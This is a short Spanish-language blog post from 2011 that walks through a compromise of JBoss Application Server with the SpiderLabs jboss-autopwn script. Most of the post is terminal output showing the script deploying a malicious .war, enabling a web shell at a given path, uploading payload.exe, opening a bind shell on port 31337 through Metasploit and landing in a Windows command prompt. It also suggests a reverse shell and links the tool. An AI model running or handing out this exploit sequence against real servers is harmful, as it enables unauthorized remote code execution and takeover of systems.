Archivo

martes, 19 de abril de 2011

Bind shell en JBoss Application Server


     JBoss es un servidor de aplicaciones J2EE, de código abierto muy popular, esta escrito en Java, que lo convierte en multiplataforma, lo corren tanto Windows, como Linux, Mac, etc..
     Ahora veamos un bind shell utilizando el script que realizo la gente de SpiderLabs
root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created succesfully on c:
[x] Now deploying .war file:
[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
[x] Server name...:
        Host Name . . . . . . . . . . . . : aquarius
[x] Would you like a reverse or bind shell or vnc(bind)? bind
[x] On which port would you like your bindshell to listen? 31337
[x] Uploading bindshell payload..
[x] Checking that bind shell was uploaded correctly..
[x] Bind shell uploaded: 22/11/2009 18:35 87,552 payload.exe
[x] Now executing bind shell...
[x] Executed bindshell!
[x] Reverting to metasploit....
[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\chris\Desktop\jboss-4.2.3.GA\server\default\tmp\deploy\tmp8376972724011216327browserwin-exp.war>
también se podría complementar con metasploit para lograr un reverse shell, recomiendo ver los ejemplos q esta en la documentacion oficial.

Para mas información ...

https://github.com/SpiderLabs/jboss-autopwn
http://www.jboss.org/
Publicar un comentario